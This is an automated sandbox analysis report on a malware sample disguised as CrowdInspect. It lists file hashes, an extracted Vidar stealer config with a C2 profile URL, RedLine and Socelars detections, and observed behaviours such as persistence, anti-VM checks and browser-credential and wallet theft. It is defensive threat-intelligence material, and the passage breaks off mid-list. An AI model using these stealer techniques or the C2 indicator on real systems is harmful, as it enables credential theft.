Analysis
-
max time kernel
2352s -
max time network
2355s -
platform
windows11_x64 -
resource
win11 -
submitted
18-10-2021 13:27
Static task
static1
General
-
Target
CrowdInspect.sfx.exe
-
Size
5.4MB
-
MD5
2c5e13c2c114e68a22533d181e78c4e7
-
SHA1
92b8ed2a8880f077bf1bbbf835b759fa5f333c46
-
SHA256
a4c21069788dbf57de477c9b2c5a2027b3d87203eae9852b7d54033687e6b738
-
SHA512
092cfe4da514c800d92f94a8f83c19f1807ceaf1981af081b94a3d6c46dcaaa69bbecee0ac198fdbb9fc33b0a295fbedb02c3d2aa461b580bc2be5f8f33a7955
Malware Config
Extracted
vidar
41.4
932
https://mas.to/@sslam
-
profile_id
932
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6088 5128 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4900 5128 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5272 5128 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/584-343-0x0000000000000000-mapping.dmp family_redline behavioral1/memory/4728-351-0x0000000000000000-mapping.dmp family_redline behavioral1/memory/4720-350-0x0000000005890000-0x0000000005EA8000-memory.dmp family_redline -
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon1190ed9443.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon1190ed9443.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 26 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execmd.exegcleaner.exeWerFault.exeWerFault.exeWerFault.exeY9cwGigB6qwOuguftOmpB8FC.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepowershell.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 4712 created 584 4712 WerFault.exe Conhost.exe PID 2020 created 1416 2020 WerFault.exe WerFault.exe PID 2068 created 4516 2068 WerFault.exe rundll32.exe PID 5980 created 5232 5980 WerFault.exe cmd.exe PID 1416 created 1248 1416 WerFault.exe Mon1190ed9443.exe PID 3376 created 2672 3376 WerFault.exe Mon11a22bde2b.exe PID 5368 created 3056 5368 WerFault.exe Conhost.exe PID 1408 created 1452 1408 cmd.exe Pro.exe PID 5052 created 3700 5052 gcleaner.exe WQ_0DNHwegoB5QOHvlIZntSr.exe PID 1712 created 5856 1712 WerFault.exe 4mulY6HX0OKjNh4y5va_iEdo.exe PID 5768 created 5492 5768 WerFault.exe Calculator.exe PID 4580 created 5688 4580 WerFault.exe msiexec.exe PID 6288 created 5204 6288 Y9cwGigB6qwOuguftOmpB8FC.exe GBI_yH9a9U9c0kT8e_JoFRwy.exe PID 432 created 2964 432 WerFault.exe setup_2.exe PID 8180 created 7040 8180 WerFault.exe K0j8f5iqbfnfHvcNjJcr34Ek.exe PID 7664 created 3500 7664 WerFault.exe tDQQVMK4kh5kC_VXdu6mwGw2.exe PID 7416 created 3720 7416 WerFault.exe powershell.exe PID 6412 created 5500 6412 powershell.exe W2JFSO1Ax2gZg76M0IGV9hjG.exe PID 7700 created 5204 7700 WerFault.exe GBI_yH9a9U9c0kT8e_JoFRwy.exe PID 2236 created 3308 2236 WerFault.exe GcleanerEU.exe PID 7352 created 7136 7352 WerFault.exe rundll32.exe PID 6824 created 6584 6824 GcleanerEU.exe PID 4288 created 2800 4288 WerFault.exe rundll32.exe PID 8056 created 5052 8056 WerFault.exe gcleaner.exe PID 7112 created 3000 7112 WerFault.exe gcleaner.exe PID 7924 created 3764 7924 WerFault.exe EASS.exe -
Processes:
resource yara_rule behavioral1/memory/6044-513-0x0000000000400000-0x0000000000B40000-memory.dmp evasion -
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
-
suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil
suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 4 IoCs
Processes:
resource yara_rule behavioral1/memory/1416-391-0x0000000004B80000-0x0000000004C56000-memory.dmp family_vidar behavioral1/memory/6044-513-0x0000000000400000-0x0000000000B40000-memory.dmp family_vidar behavioral1/memory/3056-609-0x0000000004B90000-0x0000000004C66000-memory.dmp family_vidar behavioral1/memory/3700-640-0x00000000024F0000-0x00000000025C6000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\libcurlpp.dll aspack_v212_v242 -
Blocklisted process makes network request 19 IoCs
Processes:
cmd.exepowershell.execmd.exepowershell.execmd.execmd.exepowershell.exeMsiExec.exeflow pid process 289 5232 cmd.exe 290 5232 cmd.exe 310 6280 powershell.exe 334 6044 cmd.exe 356 6044 cmd.exe 368 5704 powershell.exe 369 6044 cmd.exe 462 5704 powershell.exe 474 6980 cmd.exe 528 6980 cmd.exe 551 6508 cmd.exe 571 6980 cmd.exe 1298 1524 powershell.exe 1496 2184 MsiExec.exe 1602 2184 MsiExec.exe 1898 1524 powershell.exe 1902 1524 powershell.exe 2997 1524 powershell.exe 2999 1524 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
ShareFolder.exeShareFolder.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts ShareFolder.exe File opened for modification C:\Windows\system32\drivers\etc\hosts ShareFolder.exe -
Executes dropped EXE 64 IoCs
Processes:
CrowdInspect.exeCrowdInspect64.exeCrowdInspect.exeCrowdInspect.exeCrowdInspect.exeCrowdInspect.exesetup_x86_x64_install.exesetup_installer.exesetup_install.exeMon11bc113a5813.exeMon11b7ab2df056a.exeMon112c3d79b6fdf8.exeMon11991188390d59.exeMon114917d808c86e0ba.exeMon1173d8f84c056.exeMon1190ed9443.exeMon110c83ac9fca39.exeMon11f55cde4ec30.exepostback.exeMon11cd46e0d889458.exeMon11a9d578c6.exeMon1124e978ea57bf.exeMon114917d808c86e0ba.exeMon11c267c861c0984e.exeMon114917d808c86e0ba.tmpMon11b7ab2df056a.exeMon11a22bde2b.exeConhost.exeWerFault.exejBnRXiidSZk9hgIAefJUErEC.exejBnRXiidSZk9hgIAefJUErEC.exeConhost.exeinst1.exeBCleanSoft82.exeF44LQM.eXEConhost.exePro.exe79bdtvSpzzQK8f1KkdyOR7P4.exeQPeacnpa5OCyBgRir69RuR8o.exeWQ_0DNHwegoB5QOHvlIZntSr.exeIj6YtsqVdlgwgUz3rMkCp0mj.exeQPeacnpa5OCyBgRir69RuR8o.exeGBI_yH9a9U9c0kT8e_JoFRwy.exewmiprvse.execmd.exeidentity_helper.exep9IkKDDHEvPP_0EBsFu2v6aq.exefLt5aaWDMdJHJUJsdaAbuivD.exebrLy3TAdoOEVkJuOS7U49MCH.exe0knn9mY0l5PQHp4gWsjZSlpS.exepowershell.exexWDw4KvnprXoiUalqAVdu3zs.exeCalculator.exemsiexec.exeq1qArhKu7efjajBNmy5h0n8M.exe4mulY6HX0OKjNh4y5va_iEdo.exeBPB6ZJQKq01MUb8AG050pNjq.exeConhost.exelng6k_fhu4_efH3KoMaBWcns.exejv3ip_oP7Js5FEg88aQhg9IS.exeqCbGN2Tg1ZNb43oxn6V5pPXu.exesetup.exeIj6YtsqVdlgwgUz3rMkCp0mj.exepid process 1628 CrowdInspect.exe 1816 CrowdInspect64.exe 4640 CrowdInspect.exe 3908 CrowdInspect.exe 4788 CrowdInspect.exe 4860 CrowdInspect.exe 3512 setup_x86_x64_install.exe 4656 setup_installer.exe 1356 setup_install.exe 2280 Mon11bc113a5813.exe 5104 Mon11b7ab2df056a.exe 852 Mon112c3d79b6fdf8.exe 1416 Mon11991188390d59.exe 4808 Mon114917d808c86e0ba.exe 1900 Mon1173d8f84c056.exe 1248 Mon1190ed9443.exe 1512 Mon110c83ac9fca39.exe 5008 Mon11f55cde4ec30.exe 5000 postback.exe 4836 Mon11cd46e0d889458.exe 4060 Mon11a9d578c6.exe 2132 Mon1124e978ea57bf.exe 1220 Mon114917d808c86e0ba.exe 4544 Mon11c267c861c0984e.exe 4004 Mon114917d808c86e0ba.tmp 4720 Mon11b7ab2df056a.exe 2672 Mon11a22bde2b.exe 584 Conhost.exe 4728 WerFault.exe 2380 jBnRXiidSZk9hgIAefJUErEC.exe 3676 jBnRXiidSZk9hgIAefJUErEC.exe 3748 Conhost.exe 5000 postback.exe 4868 inst1.exe 1532 BCleanSoft82.exe 2536 F44LQM.eXE 3056 Conhost.exe 1452 Pro.exe 4752 79bdtvSpzzQK8f1KkdyOR7P4.exe 408 QPeacnpa5OCyBgRir69RuR8o.exe 3700 WQ_0DNHwegoB5QOHvlIZntSr.exe 3204 Ij6YtsqVdlgwgUz3rMkCp0mj.exe 5196 QPeacnpa5OCyBgRir69RuR8o.exe 5204 GBI_yH9a9U9c0kT8e_JoFRwy.exe 5212 wmiprvse.exe 5232 cmd.exe 5244 identity_helper.exe 5148 p9IkKDDHEvPP_0EBsFu2v6aq.exe 5320 fLt5aaWDMdJHJUJsdaAbuivD.exe 5336 brLy3TAdoOEVkJuOS7U49MCH.exe 5404 0knn9mY0l5PQHp4gWsjZSlpS.exe 5452 powershell.exe 5484 xWDw4KvnprXoiUalqAVdu3zs.exe 5492 Calculator.exe 5688 msiexec.exe 5704 q1qArhKu7efjajBNmy5h0n8M.exe 5856 4mulY6HX0OKjNh4y5va_iEdo.exe 5872 BPB6ZJQKq01MUb8AG050pNjq.exe 5904 Conhost.exe 5940 lng6k_fhu4_efH3KoMaBWcns.exe 5948 jv3ip_oP7Js5FEg88aQhg9IS.exe 5956 qCbGN2Tg1ZNb43oxn6V5pPXu.exe 5812 setup.exe 6000 Ij6YtsqVdlgwgUz3rMkCp0mj.exe -
Modifies Windows Firewall 1 TTPs
-
Checks BIOS information in registry 2 TTPs 36 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
6169518.exe1715481.exeCalculator.exesvchost.exe104049.exeidentity_helper.exesvchost.exeQPeacnpa5OCyBgRir69RuR8o.exe6475169.exejv3ip_oP7Js5FEg88aQhg9IS.exe0knn9mY0l5PQHp4gWsjZSlpS.exe3603410.exelng6k_fhu4_efH3KoMaBWcns.exeQPeacnpa5OCyBgRir69RuR8o.exe79bdtvSpzzQK8f1KkdyOR7P4.exepowershell.exexWDw4KvnprXoiUalqAVdu3zs.execmd.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6169518.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1715481.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Calculator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 104049.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion identity_helper.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 104049.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion QPeacnpa5OCyBgRir69RuR8o.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion identity_helper.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6475169.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion jv3ip_oP7Js5FEg88aQhg9IS.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0knn9mY0l5PQHp4gWsjZSlpS.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3603410.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Calculator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion lng6k_fhu4_efH3KoMaBWcns.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion QPeacnpa5OCyBgRir69RuR8o.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 79bdtvSpzzQK8f1KkdyOR7P4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion QPeacnpa5OCyBgRir69RuR8o.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion QPeacnpa5OCyBgRir69RuR8o.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion xWDw4KvnprXoiUalqAVdu3zs.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 79bdtvSpzzQK8f1KkdyOR7P4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6169518.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1715481.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3603410.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion lng6k_fhu4_efH3KoMaBWcns.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0knn9mY0l5PQHp4gWsjZSlpS.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6475169.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion xWDw4KvnprXoiUalqAVdu3zs.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion jv3ip_oP7Js5FEg88aQhg9IS.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion svchost.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_install.exepostback.exeMon114917d808c86e0ba.tmprundll32.exesetup.tmpsetup.tmpZNjEhM7gVrAAxuwEiyqOJ34t.exefLt5aaWDMdJHJUJsdaAbuivD.exemsiexec.exeLzmwAqmV.exeugEsHRx54YV5ePchkNJT6lmN.exepXqJ9z4kMcKRrHcFa0zq6bMh.tmps9ldn7_ecQr1OKXD8s8Chci6.exemrHwPgjMlMAKo1RO_q8Zcfe4.tmpsetup.exesetup.exesetup.exemsiexec.exemsiexec.exepid process 1356 setup_install.exe 1356 setup_install.exe 1356 setup_install.exe 1356 setup_install.exe 1356 setup_install.exe 5000 postback.exe 4004 Mon114917d808c86e0ba.tmp 4516 rundll32.exe 5008 setup.tmp 4616 setup.tmp 5564 ZNjEhM7gVrAAxuwEiyqOJ34t.exe 5564 ZNjEhM7gVrAAxuwEiyqOJ34t.exe 5320 fLt5aaWDMdJHJUJsdaAbuivD.exe 5564 ZNjEhM7gVrAAxuwEiyqOJ34t.exe 2092 msiexec.exe 5564 ZNjEhM7gVrAAxuwEiyqOJ34t.exe 5564 ZNjEhM7gVrAAxuwEiyqOJ34t.exe 3928 LzmwAqmV.exe 3928 LzmwAqmV.exe 3928 LzmwAqmV.exe 3928 LzmwAqmV.exe 3928 LzmwAqmV.exe 3928 LzmwAqmV.exe 3928 LzmwAqmV.exe 3928 LzmwAqmV.exe 3928 LzmwAqmV.exe 3928 LzmwAqmV.exe 3928 LzmwAqmV.exe 3928 LzmwAqmV.exe 3928 LzmwAqmV.exe 3928 LzmwAqmV.exe 3928 LzmwAqmV.exe 3928 LzmwAqmV.exe 3928 LzmwAqmV.exe 3928 LzmwAqmV.exe 3928 LzmwAqmV.exe 3928 LzmwAqmV.exe 3928 LzmwAqmV.exe 3928 LzmwAqmV.exe 3928 LzmwAqmV.exe 3928 LzmwAqmV.exe 1476 ugEsHRx54YV5ePchkNJT6lmN.exe 1476 ugEsHRx54YV5ePchkNJT6lmN.exe 7488 pXqJ9z4kMcKRrHcFa0zq6bMh.tmp 7548 s9ldn7_ecQr1OKXD8s8Chci6.exe 7548 s9ldn7_ecQr1OKXD8s8Chci6.exe 7764 mrHwPgjMlMAKo1RO_q8Zcfe4.tmp 1476 ugEsHRx54YV5ePchkNJT6lmN.exe 7548 s9ldn7_ecQr1OKXD8s8Chci6.exe 7548 s9ldn7_ecQr1OKXD8s8Chci6.exe 1476 ugEsHRx54YV5ePchkNJT6lmN.exe 1476 ugEsHRx54YV5ePchkNJT6lmN.exe 1476 ugEsHRx54YV5ePchkNJT6lmN.exe 7548 s9ldn7_ecQr1OKXD8s8Chci6.exe 7548 s9ldn7_ecQr1OKXD8s8Chci6.exe 8132 setup.exe 8132 setup.exe 6588 setup.exe 6588 setup.exe 7096 setup.exe 7096 setup.exe 1788 msiexec.exe 1788 msiexec.exe 5688 msiexec.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 17 IoCs
Processes:
msedge.exemsedge.exeShareFolder.exesetup.exeSettings%20Installation.exesetup.exeDllHost.exesetup.exepowershell.exeaipackagechainer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" msedge.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Microsoft.NET\\Nuhytehuco.exe\"" ShareFolder.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --EpsUK1" setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Settings%20Installation.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --EpsUK1" setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" DllHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --EpsUK1" setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --EpsUK1" powershell.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run aipackagechainer.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\ aipackagechainer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Settings = "C:\\Users\\Admin\\AppData\\Roaming\\Settings\\Settings.exe --EpsUK1" Settings%20Installation.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe -
Checks for any installed AV software in registry 1 TTPs 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
104049.exe6169518.exe1715481.exeCalculator.exesvchost.exelng6k_fhu4_efH3KoMaBWcns.execmd.exe79bdtvSpzzQK8f1KkdyOR7P4.exe3603410.exeQPeacnpa5OCyBgRir69RuR8o.exe0knn9mY0l5PQHp4gWsjZSlpS.exeQPeacnpa5OCyBgRir69RuR8o.exexWDw4KvnprXoiUalqAVdu3zs.exejv3ip_oP7Js5FEg88aQhg9IS.exe6475169.exesvchost.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 104049.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6169518.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1715481.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Calculator.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA lng6k_fhu4_efH3KoMaBWcns.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cmd.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 79bdtvSpzzQK8f1KkdyOR7P4.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3603410.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA QPeacnpa5OCyBgRir69RuR8o.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 0knn9mY0l5PQHp4gWsjZSlpS.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA QPeacnpa5OCyBgRir69RuR8o.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA xWDw4KvnprXoiUalqAVdu3zs.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jv3ip_oP7Js5FEg88aQhg9IS.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6475169.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA svchost.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exesetting.exeinstaller.exedescription ioc process File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\H: setting.exe File opened (read-only) \??\J: setting.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\R: setting.exe File opened (read-only) \??\Z: setting.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\M: setting.exe File opened (read-only) \??\X: setting.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Q: setting.exe File opened (read-only) \??\V: setting.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\U: setting.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\O: setting.exe File opened (read-only) \??\W: setting.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: setting.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\Y: setting.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\B: setting.exe File opened (read-only) \??\E: setting.exe File opened (read-only) \??\I: setting.exe File opened (read-only) \??\S: setting.exe File opened (read-only) \??\K: setting.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\P: setting.exe File opened (read-only) \??\T: setting.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: setting.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\G: setting.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 11 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 142 ipinfo.io 305 ipinfo.io 386 ipinfo.io 397 ipinfo.io 599 ipinfo.io 138 ipinfo.io 137 ipinfo.io 308 ipinfo.io 380 ipinfo.io 603 checkip.dyndns.org 126 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
Processes:
cmd.exe79bdtvSpzzQK8f1KkdyOR7P4.exejv3ip_oP7Js5FEg88aQhg9IS.exeidentity_helper.exepowershell.exe0knn9mY0l5PQHp4gWsjZSlpS.exe6169518.exe6475169.exe1715481.exe3603410.exelng6k_fhu4_efH3KoMaBWcns.exe104049.exepid process 6044 cmd.exe 4752 79bdtvSpzzQK8f1KkdyOR7P4.exe 5948 jv3ip_oP7Js5FEg88aQhg9IS.exe 5244 identity_helper.exe 5704 powershell.exe 5404 0knn9mY0l5PQHp4gWsjZSlpS.exe 6952 6169518.exe 6784 6475169.exe 6696 1715481.exe 6516 3603410.exe 5940 lng6k_fhu4_efH3KoMaBWcns.exe 4420 104049.exe -
Suspicious use of SetThreadContext 7 IoCs
Processes:
